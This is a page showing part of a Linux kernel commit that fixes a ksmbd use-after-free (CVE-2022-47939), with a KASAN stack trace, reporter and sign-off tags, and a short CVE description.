\[ 1685.468135 \]  dump\_stack\_lvl+0x49/0x5f
\[ 1685.468141 \]  print\_report.cold+0x5e/0x5cf
\[ 1685.468145 \]  ? ksmbd\_tree\_conn\_disconnect+0x131/0x160 \[ksmbd\]
\[ 1685.468157 \]  kasan\_report+0xaa/0x120
\[ 1685.468194 \]  ? ksmbd\_tree\_conn\_disconnect+0x131/0x160 \[ksmbd\]
\[ 1685.468206 \]  \_\_asan\_report\_load4\_noabort+0x14/0x20
\[ 1685.468210 \]  ksmbd\_tree\_conn\_disconnect+0x131/0x160 \[ksmbd\]
\[ 1685.468222 \]  smb2\_tree\_disconnect+0x175/0x250 \[ksmbd\]
\[ 1685.468235 \]  handle\_ksmbd\_work+0x30e/0x1020 \[ksmbd\]
\[ 1685.468247 \]  process\_one\_work+0x778/0x11c0
\[ 1685.468251 \]  ? \_raw\_spin\_lock\_irq+0x8e/0xe0
\[ 1685.468289 \]  worker\_thread+0x544/0x1180
\[ 1685.468293 \]  ? \_\_cpuidle\_text\_end+0x4/0x4
\[ 1685.468297 \]  kthread+0x282/0x320
\[ 1685.468301 \]  ? process\_one\_work+0x11c0/0x11c0
\[ 1685.468305 \]  ? kthread\_complete\_and\_exit+0x30/0x30
\[ 1685.468309 \]  ret\_from\_fork+0x1f/0x30

Fixes: e2f3448 ("cifsd: add server-side procedures for SMB3")
Cc: stable@vger.kernel.org
Reported-by: zdi-disclosures@trendmicro.com # ZDI-CAN-17816
Signed-off-by: Namjae Jeon <linkinjeon@kernel.org>
Reviewed-by: Hyunchul Lee <hyc.lee@gmail.com>
Signed-off-by: Steve French <stfrench@microsoft.com>

*   Loading branch information

CVE-2022-47939: ksmbd: fix use-after-free bug in smb2_tree_disconect · torvalds/linux@cf6531d

An issue was discovered in ksmbd in the Linux kernel before 5.19.2. fs/ksmbd/smb2misc.c has an out-of-bounds read and OOPS for SMB2_TREE_CONNNECT.

Tag

#linux